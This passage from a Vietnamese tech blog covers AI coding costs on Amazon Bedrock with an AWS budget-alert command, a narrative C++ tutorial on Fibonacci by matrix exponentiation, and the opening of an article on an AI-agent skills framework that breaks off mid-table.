Total: $0.89 | 22 phút | 6 files | 342 lines
  Sonnet: $0.58 (coding + refactor)
  Haiku:  $0.31 (simple tasks + review)
</code></pre><p>22 phút, 6 files, có cả review và refactor, chưa đến $1.</p><hr><h2 id="sau-1-tu-n-chi-ph-th-c-t-v-tips">Sau 1 tuần: Chi phí thực tế và tips</h2><h3 id="-c-t-nh-h-ng-th-ng-22-ng-y-">Ước tính hàng tháng (22 ngày)</h3><!--kg-card-begin: html--><table>
<thead>
<tr>
<th>Mức độ</th>
<th>Mô tả</th>
<th>Sonnet only</th>
<th>Tối ưu (60% Haiku + 40% Sonnet)</th>
</tr>
</thead>
<tbody>
<tr>
<td>Nhẹ</td>
<td>Review, sửa nhỏ</td>
<td>~$50</td>
<td>~$30</td>
</tr>
<tr>
<td>Trung bình</td>
<td>Feature dev, tests</td>
<td>~$150</td>
<td>~$90</td>
</tr>
<tr>
<td>Nặng</td>
<td>Full agentic, refactoring</td>
<td>~$300</td>
<td>~$180</td>
</tr>
</tbody>
</table><!--kg-card-end: html--><h3 id="tips-c-k-t-sau-1-tu-n-s-d-ng">Tips đúc kết sau 1 tuần sử dụng</h3><p><strong>Session dài = rẻ.</strong> Tip quan trọng nhất. Mở Claude Code, hỏi 15-20 câu liên tục rồi tắt. Đừng hỏi 1 câu, tắt, mở lại — mỗi lần mở là Cache Write lại.</p><p><strong>Batch tasks tương tự.</strong> Review 3 files trong 1 session: 1 Cache Write + 2 Cache Read, rẻ hơn nhiều so với 3 session riêng.</p><p><strong>Prompt cụ thể.</strong> "Review main.py, liệt kê bugs và fix" thay vì "xem qua file này giúp tôi". Output đắt 5x input, prompt cụ thể giúp output ngắn hơn.</p><p><strong><code>.claudeignore</code></strong> để loại các thư mục không cần thiết. Context nhỏ hơn = Cache Write ít hơn = rẻ hơn. Tạo file <code>.claudeignore</code> ở root project:</p><pre><code>node_modules/
dist/
build/
.git/
coverage/
*.lock
*.log
*.min.js
*.map
</code></pre><p>Syntax giống <code>.gitignore</code>. Claude Code đọc file này và bỏ qua hoàn toàn những path đó khi nạp context.</p><p><strong><code>/compact</code></strong> khi conversation dài. Nén context, tiết kiệm token cho câu hỏi sau.</p><p><strong>Budget Alert</strong> — setup ngay từ đầu, đừng đợi cuối tháng mới biết:</p><pre><code class="language-bash">aws budgets create-budget \
  --account-id $(aws sts get-caller-identity --query Account --output text) \
  --budget '{
    "BudgetName": "Bedrock-Monthly",
    "BudgetLimit": {"Amount": "100", "Unit": "USD"},
    "BudgetType": "COST",
    "TimeUnit": "MONTHLY",
    "CostFilters": {"Service": ["Amazon Bedrock"]}
  }'
</code></pre><hr><h2 id="nh-n-l-i-1-tu-n">Nhìn lại 1 tuần</h2><p>Setup mất 15 phút. Hiểu cách tính phí mất 1 ngày. Tối ưu multi-agent mất thêm 1 ngày nữa. Mấy đứa trong team ban đầu hơi skeptical — "AI mà setup nhiều vậy?" — nhưng sau khi thử 1 buổi thì không ai hỏi thêm nữa.</p><p>Nếu chỉ nhớ 1 thứ từ bài này: đừng mở nhiều session ngắn. Cache Write là khoản "phí vào cửa" — trả 1 lần rồi hỏi thả ga. Phần còn lại, chọn model và tạo agent, là tối ưu thêm, không phải điều kiện bắt buộc.</p><p>Chi phí thực tế với mix 60/40 Haiku/Sonnet khoảng $90/tháng/người. Nếu mỗi ngày tiết kiệm được 30 phút code review thì ROI tính trong vài tuần — và đó là ước tính thận trọng.</p><hr><h2 id="t-i-li-u-tham-kh-o">Tài liệu tham khảo</h2><ul><li><a href="https://docs.anthropic.com/en/docs/claude-code/amazon-bedrock">Claude Code on Amazon Bedrock — Anthropic Docs</a></li><li><a href="https://aws.amazon.com/bedrock/pricing/">Amazon Bedrock Pricing</a></li><li><a href="https://docs.anthropic.com/en/docs/build-with-claude/prompt-caching">Prompt Caching — Anthropic Docs</a></li><li><a href="https://docs.anthropic.com/en/docs/claude-code/sub-agents">Claude Code Sub-agents</a></li><li><a href="https://www.anthropic.com/research/building-effective-agents">Building Effective Agents — Anthropic Research</a></li><li><a href="https://docs.aws.amazon.com/bedrock/latest/userguide/cross-region-inference.html">Bedrock Cross-Region Inference</a></li><li><a href="https://docs.anthropic.com/en/docs/claude-code/ide-integrations">Claude Code IDE Integrations</a></li></ul>
</article>
<article>
<h1>Cách tính Fibonacci trong Competitive Programming</h1>
<p>Nguyễn Trương Anh Minh — Fri, 26 Jun 2026 07:55:34 GMT</p>
<p>Dãy số Fibonacci, tỉ lệ vàng, những cụm từ này đã không còn xa lạ trong giới Toán học, Kinh tế, Nghệ thuật hay Lập trình.</p><p>Dãy Fibonacci là dãy vô hạn các số tự nhiên bắt đầu bằng hai phần tử 0 hoặc 1 và 1, các phần tử sau đó được thiết lập theo quy tắc mỗi phần tử luôn bằng tổng hai phần tử trước nó: </p><figure class="kg-card kg-image-card"></figure><!--kg-card-begin: markdown--><table>
<thead>
<tr>
<th>n</th>
<th>0</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
<th>9</th>
<th>10</th>
<th>...</th>
</tr>
</thead>
<tbody>
<tr>
<td>F(n)</td>
<td>0</td>
<td>1</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>5</td>
<td>8</td>
<td>13</td>
<td>21</td>
<td>34</td>
<td>55</td>
<td>...</td>
</tr>
</tbody>
</table>
<!--kg-card-end: markdown--><p>Chắc hẳn mọi người ai cũng đã nghe qua bài toán đàn thỏ gắn liền với dãy số này, và sự xuất hiện của tỉ lệ vàng φ ≈ 1.618, con số mà xuất hiện hầu như trong khắp mọi nơi trong tự nhiên.</p><p>Khi nói về dãy số này, có vô vàn điều thú vị và hay ho để khám phá về nó, nhưng những chủ đề đó có lẽ sẽ phải hẹn vào dịp khác.</p><hr><!--kg-card-begin: markdown--><p>Hôm nay, có một cậu học sinh, hoặc là cậu sinh viên, hay chỉ đơn thuần là một cậu trai, hãy tạm thời gọi cậu là <strong>B</strong>. <strong>B</strong> là một người tò mò, hoặc không, cậu luôn luôn lạc quan, hoặc ảm đạm, và cả quyết, hoặc không thể chắc chắn về điều gì. <strong>B</strong> là ai, chúng ta không thể chắc chắn được nhưng điều đó thật ra không quan trọng vì cho dù <strong>B</strong> là ai thì chắc chắn rằng ít người đọc và quan tâm đến. Dù vậy có một điều rất rõ, <strong>B rất dở tính toán</strong>.<br>
<strong>B</strong> đang tìm tòi học hỏi về dãy số Fibonacci và cậu muốn biết số Fibonacci thứ <strong>n</strong> sau khi chia lấy dư cho 1000000007. Một bài toán đơn giản. Nhưng vì não cậu không có nhiều nếp nhăn nên cho dù cậu có cố gắng tính toán thế nào cũng bị sai sót.</p>
<p>Bạn, là một lập trình viên và bạn biết C++, hùng hồn đến trước mặt <strong>B</strong> và tuyên bố:</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><pre><code class="language-cpp">#include <iostream>
using namespace std;

const int MOD = 1e9 + 7;

int main() {
    int n = 1000000;
    long long a = 0, b = 1;
    for (int i = 2; i <= n; i++) {
        long long c = (a + b) % MOD;
        a = b;
        b = c;
    }
    cout << "F(" << n << ") mod " << MOD << " = " << b << endl;
    return 0;
}
</code></pre>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><pre><code>F(1000000) mod 1000000007 = 918091266
</code></pre>
<!--kg-card-end: markdown--><p>Splendid! Bạn lôi ra một đoạn code kinh điển mà bất cứ người học sinh, sinh viên nào học về thuật toán Quy hoạch động đều biết đến. Một vòng lặp duy nhất để tính dần dần số Fibonacci từ 1 đến n bằng chính công thức định nghĩa nên dãy số: <strong>F(n) = F(n - 1) + F(n - 2)</strong>. Với độ phức tạp về thời gian là <strong>O(n)</strong>, nó có thể tính toán chính xác số Fibonacci thứ 1000000 mà chưa cần tới 1 giây.</p><p>Bạn tuyên bố đoạn code này trước mặt <strong>B</strong>, cảm thấy mình như một đấng cứu thế giúp đỡ <strong>B</strong>, một người đang gặp khó khăn trong cuộc sống trong việc tính toán số Fibonacci, và kì vọng rằng <strong>B</strong> nhìn bạn với những đôi mắt lấp lánh và biết ơn bạn với cả trái tim.</p><p>Và cứ như vậy, <strong>B</strong> đáp lại:</p><p><em>Ah, bạn giỏi á, 2 năm trước mình cũng từng code một đoạn như vậy và tính ra được số Fibonacci thứ 1000000. Mình cảm ơn tấm lòng của bạn nhưng số Fibonacci mình đang tìm là số Fibonacci thứ 1000000000000000000 kia.</em></p><p>...</p><p>Có lẽ bạn đã quên mất rằng chính mình đã nói rằng đó là <strong>"đoạn code kinh điển mà bất cứ người học sinh, sinh viên nào học về thuật toán Quy hoạch động đều biết đến"</strong>. <strong>B </strong>cũng là một người học ở chung trường, chung ngành và chung lớp với bạn, đó là lí do tại sao bạn lại thấy <strong>B</strong> đang gặp khó khăn và chạy tới giúp đỡ ngay từ ban đầu. Và đương nhiên, <strong>B</strong> phải biết tới đoạn code này, và đương nhiên, ai ở trong lớp này cũng biết.</p><p>Bạn đứng ở đó, cảm thấy mọi ánh mắt đều hướng nhìn về bạn. Thời gian như đang ngưng đọng lại, đây là khoảnh khắc căng thẳng nhất trong cuộc đời của bạn. Trong <strong>21 nano giây</strong> nữa, mọi người trong lớp sẽ nhận thức ra được bộ dạng ra vẻ "đấng cứu thế" của bạn. Sau khi 21 nano giây kết thúc, hoặc là bạn sẽ trở thành một cây hài cho cả lớp và cảm thấy nhục nhã suốt phần đời còn lại của bạn, hoặc là bạn thật sự trở thành một đấng cứu thế và <strong>dùng một đoạn code mà không phải học sinh, sinh viên nào đều biết tới khi học Quy hoạch động</strong>.</p><p>Nhưng bạn biết rõ, bạn không hề biết tới đoạn code đó. Bạn là con mèo Schrödinger nhưng chỉ với một khả năng duy nhất khi chiếc hộp đen được mở ra sau 21 nano giây. <strong>Con mèo đã chết</strong>. Bạn biết rõ rằng mình cần phải làm gì trong hoàn cảnh này. Trong 21 nano giây, bạn phải tạo ra được khả năng con mèo còn sống.</p><p>Với những tế bào não bạn đã dành dụm từ khi được sinh ra, bạn bắt đầu nghĩ.</p><hr><p><em>21 nano giây</em></p><hr><p><strong>Chỉ với độ phức tạp thời gian O(1)...</strong></p><p>Trong lớp Kinh tế, bạn đã được học một công thức có liên quan tới tỉ lệ vàng để tính xấp xỉ số Fibonacci.</p><figure class="kg-card kg-image-card"></figure><p><em>Là công thức Binet. Chính là nó.</em></p><p><em>Chỉ cần ráp công thức vào là ra mà không cần phải làm gì nhiều. Độ phức tạp thời gian là O(1) thì muốn tính số Fibonacci số bao nhiêu mà chẳng được?</em></p><p>Đó là những gì bạn đã suy nghĩ. Nhưng rồi bạn nhận ra: <strong>bạn phải tính số Fibonacci thứ n sau khi chia lấy phần dư cho 1000000007</strong>.</p><p>Nếu như nhìn vào công thức, để tính toán được phải áp dụng modulo và nghịch đảo modulo. Và nó không hề dễ chịu một chút nào. </p><p>Còn nếu cứ tính thẳng bằng số thực rồi làm tròn, sai số dấu phẩy động sẽ lặng lẽ tích tụ, khi n lớn, con số cuối cùng lệch hoàn toàn so với đáp án đúng.</p><p>Bạn phải tìm một cách khác.</p><hr><p><em>17 nano giây</em></p><hr><p><strong>Ma trận</strong>. Ma trận á?</p><p>Bạn đang suy nghĩ tới ma trận. Không phải là ma trận trong bộ phim mà có một gã đàn ông mặc bộ vest màu đen đột nhiên giơ tay lên, một cách thần kì nào đó chặn hàng loạt viên đạn đang bay tới, mà bạn đang nghĩ tới ma trận trong môn Đại số tuyến tính. Không phải là một ma trận ngẫu nhiên nào, bạn đang nghĩ tới một ma trận đột nhiên xuất hiện trong đầu bạn bằng một cách thần kì nào đó:</p><figure class="kg-card kg-image-card"></figure><p>Tại sao lại là ma trận này? Bạn thật sự không biết tại sao mình lại nghĩ tới một ma trận ngẫu nhiên này, khi bạn có thể dành thời gian để áp dụng các thuật toán mà các chuyên gia sử dụng thì bạn lại suy nghĩ ra một ma trận hoàn toàn ngẫu nhiên và cụ thể này mà không có tác dụng gì cả? Thật là phí thời gian...</p><hr><p><em>15 nano giây</em></p><hr><p>Bạn đã phí thời gian.</p><p>Bạn không kịp suy nghĩ gì. Nhưng với ma trận bạn đã nghĩ ra, bạn quyết định dùng nó để nhân với một vector.</p><figure class="kg-card kg-image-card"></figure><p>...và lại tiếp tục nhân nó với ma trận đó.</p><figure class="kg-card kg-image-card"></figure><p>...và bạn cứ tiếp tục.</p><figure class="kg-card kg-image-card"></figure><p>Bạn nhận ra một thứ gì đó khá quen thuộc. Đúng hơn, các con số, và dãy các con số, bạn cảm thấy chúng rất quen thuộc. Đúng rồi, nó là dãy số Fibonacci!</p><hr><p><em>10 nano giây</em></p><hr><p>Bạn tiếp tục suy nghĩ, bạn suy nghĩ ở mức tổng quát hơn. Bạn đang tưởng tượng việc nhân một vector, có 2 phần tử, phần tử đầu tiên là số Fibonacci thứ <strong>n - 1 </strong>và phần tử thứ 2 là số Fibonacci thứ <strong>n</strong>. Bạn thử nhân vector này với ma trận đó.</p><figure class="kg-card kg-image-card"></figure><p>Bạn nhận ra ngay, nếu tiếp tục...</p><figure class="kg-card kg-image-card"></figure><p>Nói cách khác, nếu bạn làm thế này:</p><figure class="kg-card kg-image-card"></figure><p>Thì bạn sẽ tính được <strong>số Fibonacci thứ n</strong>!</p><hr><p><em>6 nano seconds</em></p><hr><p>Bạn cần một thuật toán để tính được lũy thừa bậc <strong>n - 1</strong> của ma trận trên với độ phức tạp thời gian thấp. Ít nhất là phải thấp hơn O(n), nếu không công sức trong 15 nano giây lúc nãy trở thành công cốc. Một thuật toán với độ phức tạp về thời gian <strong>O(logn) </strong>thì sao? Thuật toán có độ phức tạp O(logn)? Segment Tree? tìm kiếm nhị phân? Chia để trị?...</p><hr><p><em>4 nano giây</em></p><hr><p><strong>Chia để trị!</strong></p><p>Bạn để ý tới một điều:</p><figure class="kg-card kg-image-card"></figure><p>Để tính lũy thừa ma trận bậc <strong>k</strong>, bạn cần tính lũy thừa ma trận bậc <strong>k/2</strong>. Để tính lũy thừa ma trận bậc <strong>k/2</strong>, bạn cần tính lũy thừa ma trận bậc <strong>k/4</strong>...</p><hr><p><em>1 nano giây</em></p><hr><p>Với kĩ năng anh hùng bàn phím của bạn...</p><!--kg-card-begin: markdown--><pre><code class="language-cpp">#include <iostream>
#include <assert.h>
#include <vector>
using namespace std;

#define LL long long
#define Matrix vector<vector<LL>>

const int MOD = 1e9 + 7;

Matrix identity(int dim) {
    Matrix I(dim, vector<LL>(dim, 0));
    for (int i = 0; i < dim; i++)
        I[i][i] = 1;
    return I;
}

Matrix mulMod(Matrix A, Matrix B, int MOD) {
    assert(A.size() != 0);
    assert(B.size() != 0);
    assert(A[0].size() == B.size());

    int n = A.size(), m = B[0].size(), k = B.size();
    Matrix C(n, vector<long long>(m, 0));

    for (int i = 0; i < n; i++)
        for (int j = 0; j < m; j++)
            for (int p = 0; p < k; p++)
                C[i][j] = (C[i][j] + A[i][p] * B[p][j]) % MOD;

    return C;
}

Matrix matPowMod(Matrix A, LL k, int MOD) {
    assert(A.size() != 0);
    assert(A.size() == A[0].size());
    int dim = A.size();
    if(k == 0) {
        return identity(dim);
    }
    if(k == 1) {
        return A;
    }
    
    Matrix B = matPowMod(A, k / 2, MOD);
    Matrix squaredB = mulMod(B, B, MOD);
    if(k % 2 == 0) {
        return squaredB;
    }
    
    return mulMod(squaredB, A, MOD);
}

int main() {
    LL n = 1000000000000000000LL;

    Matrix trans = {
        {0, 1},
        {1, 1}
    };

    Matrix powered = matPowMod(trans, n - 1, MOD);

    Matrix init = {{0, 1}};

    // [0, 1] * trans^(n-1) = [F(n-1), F(n)]
    Matrix result = mulMod(init, powered, MOD);

    cout << "F(" << n << ") mod " << MOD << " = " << result[0][1] << endl;
    return 0;
}
</code></pre>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><pre><code>F(1000000000000000000) mod 1000000007 = 209783453
</code></pre>
<!--kg-card-end: markdown--><hr><p>...</p><p>...</p><p>...</p><p><strong>B</strong> là ai? Điều đó có thật sự quan trọng không? Một ngày đẹp trời, một ngày chắc chắn không phải hôm nay, có thể không phải ở quá khứ, có thể không phải ở tương lai, cậu học sinh, hay cậu sinh viên, hay chỉ đơn thuần là một cậu trai, đã giải một bài toán: <a href="https://codeforces.com/problemset/problem/1513/C">Problem - 1513C - Codeforces</a>. Đề bài và kết quả kiểm tra được thiết kế để khi chạy với thuật toán đáp án dự kiến của bài toán, nó sẽ tốn gần <strong>1 giây</strong> để tính ra kết quả với trường hợp số lớn nhất mà đề bài đã cho. Nhưng, trên bảng điểm, nơi lưu lại dấu vết, hoặc sự ghi nhận kết quả mà những người đã bỏ công sức ra để giải quyết bài toán, tên <strong>B </strong>cùng với thời gian chạy của thuật toán của cậu ta được ghi rõ trên đó, <strong>0.1 giây</strong>. <strong>B</strong> thật ra không hề giỏi về việc tính toán, nhưng không có nghĩa là cậu chỉ sử dụng sức tính toán của con người của mình. <strong>B </strong>sẽ nhận ra, hoặc đã nhận ra điều này?</p>
</article>
<article>
<h1>Superpowers: Biến AI Coding Agent Thành Senior Developer Có Kỷ Luật</h1>
<p>Đ.Đ.N — Fri, 26 Jun 2026 03:57:58 GMT</p>
<p><a href="https://github.com/obra/superpowers">Superpowers</a> là một methodology + skills framework cho AI coding agents với 228k stars trên GitHub. Nó không làm AI "thông minh hơn" — nó làm AI <strong>có kỷ luật hơn</strong>: bắt buộc hỏi trước khi code, viết spec, lập plan, TDD, review, rồi mới merge. AI có thể chạy autonomous 1-2 tiếng mà không đi lệch kế hoạch.</p><hr><h3 id="1-v-n-th-c-t-m-superpowers-gi-i-quy-t">1. Vấn đề thực tế mà Superpowers giải quyết</h3><p>Ai dùng Claude Code / Cursor / Codex đều gặp tình huống này:</p><figure class="kg-card kg-image-card"></figure><p><strong>Insight quan trọng</strong>: AI không thiếu intelligence. Nó thiếu <strong>discipline</strong>. Superpowers bổ sung đúng thứ đó.</p><hr><h3 id="2-superpowers-l-g-">2. Superpowers là gì?</h3><p>Về bản chất, Superpowers là <strong>một folder markdown files</strong> đóng gói:</p><ul><li>Một <strong>software development methodology</strong> (phương pháp phát triển phần mềm)</li><li>Một bộ <strong>composable skills</strong> (kỹ năng có thể kết hợp)</li><li>Một cơ chế <strong>auto-activation</strong> (tự động kích hoạt theo context)</li></ul><figure class="kg-card kg-image-card"></figure><p><strong>Điểm khác biệt lớn nhất</strong>: Skills trigger <strong>tự động</strong>. Bạn không cần gõ command đặc biệt. AI tự biết khi nào cần brainstorm, khi nào cần TDD, khi nào cần review.</p><hr><h3 id="3-c-i-t">3. Cài đặt</h3><p>Superpowers hỗ trợ hầu hết AI coding agents hiện tại:</p><!--kg-card-begin: html--><table data-source-line="70" style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; margin: 10px 0px 15px; border-collapse: collapse; border-spacing: 0px; display: block; width: 980px; overflow: auto; word-break: keep-all; color: rgb(51, 51, 51); font-family: "Helvetica Neue", Helvetica, "Segoe UI", Arial, freesans, sans-serif; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(255, 255, 255); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><thead data-source-line="70" style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ;"><tr data-source-line="70" style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ;"><th style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; font-weight: 700; color: rgb(0, 0, 0); border: 1px solid rgb(214, 214, 214); padding: 6px 13px;">Agent</th><th style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ; font-weight: 700; color: rgb(0, 0, 0); border: 1px solid rgb(214, 214, 214); padding: 6px 13px;">Cách cài</th></tr></thead><tbody data-source-line="72" style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ;"><tr data-source-line="72" style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; --tw-gradient-to-position: ; --tw-ordinal: ; --tw-slashed-zero: ; --tw-numeric-figure: ; --tw-numeric-spacing: ; --tw-numeric-fraction: ; --tw-ring-inset: ; --tw-ring-offset-width: 0px; --tw-ring-offset-color: #fff; --tw-ring-color: rgb(59 130 246 / .5); --tw-ring-offset-shadow: 0 0 #0000; --tw-ring-shadow: 0 0 #0000; --tw-shadow: 0 0 #0000; --tw-shadow-colored: 0 0 #0000; --tw-blur: ; --tw-brightness: ; --tw-contrast: ; --tw-grayscale: ; --tw-hue-rotate: ; --tw-invert: ; --tw-saturate: ; --tw-sepia: ; --tw-drop-shadow: ; --tw-backdrop-blur: ; --tw-backdrop-brightness: ; --tw-backdrop-contrast: ; --tw-backdrop-grayscale: ; --tw-backdrop-hue-rotate: ; --tw-backdrop-invert: ; --tw-backdrop-opacity: ; --tw-backdrop-saturate: ; --tw-backdrop-sepia: ; --tw-contain-size: ; --tw-contain-layout: ; --tw-contain-paint: ; --tw-contain-style: ;"><td style="--tw-border-spacing-x: 0; --tw-border-spacing-y: 0; --tw-translate-x: 0; --tw-translate-y: 0; --tw-rotate: 0; --tw-skew-x: 0; --tw-skew-y: 0; --tw-scale-x: 1; --tw-scale-y: 1; --tw-pan-x: ; --tw-pan-y: ; --tw-pinch-zoom: ; --tw-scroll-snap-strictness: proximity; --tw-gradient-from-position: ; --tw-gradient-via-position: ; 